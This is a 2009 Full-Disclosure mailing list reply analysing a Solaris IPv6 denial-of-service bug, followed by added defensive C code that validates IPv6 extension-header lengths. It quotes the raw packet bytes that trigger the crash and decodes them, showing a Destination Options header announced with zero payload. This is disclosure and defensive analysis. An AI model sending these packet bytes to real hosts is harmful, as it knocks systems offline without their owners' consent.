Re: [Full-disclosure] Solaris IPv6 DoS vulnerabilities (was: Solaris Devs Are Smoking Pot)
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] Solaris IPv6 DoS vulnerabilities (was: Solaris Devs Are Smoking Pot)
- From: GomoR <fd@xxxxxxxxx>
- Date: Fri, 30 Jan 2009 14:49:16 +0100
On Mon, Jan 26, 2009 at 08:23:45AM +0100, Kingcope Kingcope wrote:
[..]
> unsigned char rawData[] =
> "\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58"
> "\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00"
> "\x02\x0c\x29\xff\xfe\xf1\x1e\xbb";
[..]
% perl -MNet::Frame::Simple -e 'print Net::Frame::Simple->new(raw =>
"\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0c\x29\xff\xfe\xf1\x1e\xbb",firstLayer
=> 'IPv6')->print."\n"'
Unable to unpack next layer, not yet implemented in layer: 0:IPv6
IPv6: version:6 trafficClass:0x0f flowLabel:0xc5729 nextHeader:0x3c
IPv6: payloadLength:0 hopLimit:86
IPv6: src:6f35:4072:702f:5258:cc95:1279:30bb:be25 dst:fe80::20c:29ff:fef1:1ebb

So this vulnerability is due to an implementation flaw in the
parsing of the IPv6 Destination Header (0x3c). Of course, there is
no IPv6 DH to parse :)

Does this vulnerability only exist when setting next header to 0x3c,
or does it work with other values?

My guess is that we have a more general issue here.

--
^ ___ ___ http://www.GomoR.org/ <-+
| / __ |__/ Research Engineer |
| \__/ | \ ---[ zsh$ alias psed='perl -pe ' ]--- |
+--> Net::Frame <=> http://search.cpan.org/~gomor/ <---+
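
The decode above shows a header that announces Destination Options (nextHeader 0x3c) while payloadLength is 0. The following is an added example, not code from the original post or from Solaris: a length check a parser can apply before following the extension-header chain. Function and constant names are hypothetical, the second packet is constructed, and jumbograms and the Fragment header are not handled.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define IPV6_HDR_LEN 40
enum { NH_HOPOPTS = 0, NH_ROUTING = 43, NH_DSTOPTS = 60 };
enum { CHAIN_OK = 0, CHAIN_BAD_HEADER = -1, CHAIN_TRUNCATED = -2 };

/* The 40 bytes quoted in the message: nextHeader 0x3c, payloadLength 0. */
const uint8_t quoted_pkt[40] = {
    0x60,0xfc,0x57,0x29,0x00,0x00,0x3c,0x56,0x6f,0x35,0x40,0x72,0x70,0x2f,0x52,0x58,
    0xcc,0x95,0x12,0x79,0x30,0xbb,0xbe,0x25,0xfe,0x80,0x00,0x00,0x00,0x00,0x00,0x00,
    0x02,0x0c,0x29,0xff,0xfe,0xf1,0x1e,0xbb };

/* Constructed sample: ::1 -> ::1, payloadLength 8, one 8-byte Destination
 * Options header (next header 59 = none, hdr ext len 0, PadN of 4 bytes). */
const uint8_t ok_pkt[48] = { 0x60,0,0,0, 0,8, 0x3c,64, [23] = 1, [39] = 1,
                             [40] = 0x3b,0x00, 0x01,0x04,0,0,0,0 };

/* Walk the extension headers that share the (hdr ext len + 1) * 8 layout,
 * never reading a byte beyond what payloadLength and the buffer allow.
 * On CHAIN_OK, *last_nh holds the first non-extension next-header value. */
int check_ext_chain(const uint8_t *pkt, size_t len, uint8_t *last_nh)
{
    if (len < IPV6_HDR_LEN || (pkt[0] >> 4) != 6)
        return CHAIN_BAD_HEADER;
    size_t left = ((size_t)pkt[4] << 8) | pkt[5];   /* payloadLength */
    if (left > len - IPV6_HDR_LEN)
        return CHAIN_TRUNCATED;                     /* capture shorter than claimed */
    const uint8_t *p = pkt + IPV6_HDR_LEN;
    uint8_t nh = pkt[6];
    while (nh == NH_HOPOPTS || nh == NH_ROUTING || nh == NH_DSTOPTS) {
        if (left < 8)                               /* header announced, no bytes for it */
            return CHAIN_TRUNCATED;
        size_t hlen = ((size_t)p[1] + 1) * 8;
        if (hlen > left)
            return CHAIN_TRUNCATED;
        nh = p[0];
        p += hlen;
        left -= hlen;
    }
    *last_nh = nh;
    return CHAIN_OK;
}

int main(void)
{
    uint8_t nh = 0;
    printf("quoted: %d\n", check_ext_chain(quoted_pkt, sizeof quoted_pkt, &nh));
    printf("sample: %d\n", check_ext_chain(ok_pkt, sizeof ok_pkt, &nh));
    return 0;
}
```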